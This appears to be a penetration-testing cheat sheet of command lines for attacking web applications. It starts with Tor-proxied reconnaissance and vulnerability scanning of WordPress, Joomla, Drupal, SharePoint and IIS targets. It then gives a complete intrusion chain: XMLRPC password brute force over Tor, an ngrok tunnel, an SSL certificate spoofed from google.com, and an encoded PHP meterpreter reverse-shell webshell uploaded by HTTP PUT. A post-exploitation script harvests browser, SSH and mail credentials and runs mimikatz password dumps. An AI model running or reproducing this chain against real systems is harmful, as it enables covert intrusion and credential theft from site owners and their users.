App Platform Configuration
Check List
Cheat Sheet
Sample and Known Files and Directories
20 Tor Tunnel
multitor --init 20 \
--user debian-tor \
--socks-port 9000 \
--control-port 9900 \
--proxy privoxyScan Web Server
nikto -h $WEBSITESubdomain Fuzzing
subfinder -d $WEBSITE -o /tmp/subdomains.txtResolve Subdomains
echo "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
-l /tmp/subdomains.txt \
-r /tmp/resolvers.txt \
-mode resolve \
-o /tmp/alive-subdomains.txtCheck Http Live
cat /tmp/sub-domains.txt | \
httpx -silent -sc -probe -title -td -ip \
-mc 200,404,403,302,301,303,304,305,306,307,302 \
-o /tmp/sub-domains.txtFind Alive Ports
httpx-toolkit -l /tmp/alive-subdomains.txt \
-ports 80,443,8080,8000,8888,8082,8083 \
-o /tmp/alive-sub-and-ports.txtFind Source URLs
katana -u /tmp/alive-subdomains.txt \
-d 5 -ps \
-pss waybackarchive,commoncrawl,alienvault \
-kf -jc -fx \
-ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg \
-o /tmp/all-urls.txtFind Sensitive Infos
cat /tmp/all-urls.txt | \
grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'Directory Fuzzing
dirsearch -l /tmp/sub-domains.txt \
-t 150 -x 403,404,500,429 -i 200,301,302
--random-agent List all Tags
nuclei -tglScan OSINT & Recon
nuclei -u $WEBSITE -tags osint enum reconScan CVEs & Vulnerabilities
nuclei -u $WEBSITE -tags cves detect vulnerabilitiesScan CVEs with Multitor
nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379Scan Misconf & Panel
nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panelXSS & SQLi & LFI & RCE & SSRF
nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserializationScan General
wpscan --url $WEBSITE --rua --api-token $TOKENScan with Multitor
wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379Enum Users
wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, mEnum Plugins
wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, pEnum Themes
wpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, tEnum Config Backups
wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, ttScan General
joomscan -u $WEBSITE --random-agentScan with Multitor
joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379Enum Endpoints
joomscan -u $WEBSITE --random-agent -ecScan General
droopescan scan drupal -u $WEBSITEEnum Endpoints
droopescan scan drupal -u $WEBSITE --enumerate aScan General
drupwn --mode exploit --target $WEBSITEEnum Endpoints
drupwn --mode enum --modules --target $WEBSITEEnum Users
drupwn --mode enum --users --target $WEBSITEScan SharePoint
spartan -u $WEBSITE --sps --users -sScan & Enum IIS
iis_shortname_scanner 2 20 $WEBSITEComment Review
HTML Sources
katana -u $WEBSITE JS Sources
katana -u $WEBSITE | grep "\.js$"CSS Sources
katana -u $WEBSITE | grep "\.css*"System Configuration
lynishardentools-cli.exeConfiguration Review
HTTP Methods
nmap -sS -sV --mtu 5000 --script http-methods $WEBSITEPingBack XMLRPC
msfconsole -qx "
use auxiliary/scanner/http/wordpress_pingback_access;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
run;
exit"Brute force XMLRPC with Multitor
msfconsole -qx "
use scanner/http/wordpress_xmlrpc_login;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set USERNAME admin;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
set THREADS 10;
set STOP_ON_SUCCESS true;
set Proxies socks4:127.0.0.1:16379;
run;
exit"Scan PUT Methods
msfconsole -qx "
use auxiliary/scanner/http/http_put;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set PATH /wp-content/uploads;
run -j"Start Ngrok
ngrok tcp 4444 >/dev/null 2>&1 &Define ENV Ngrok
NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')Cert Spoof
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"Define ENV Cert
CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)Post-EXP
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOFGenerate Webshell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
HandlerSSLCert=$CERT \
StagerVerifySSLCert=true \
PayloadUUIDTracking=true \
PayloadUUIDName=StagedPHP \
EnableStageEncoding=true \
-f raw \
-e php/base64 \
-i 3 \
-o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.phpListening Metasploit
msfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"Upload Shell PUT Method
curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.phpLogging
Commix
Code Injection
commix -u $WEBSITELast updated
Was this helpful?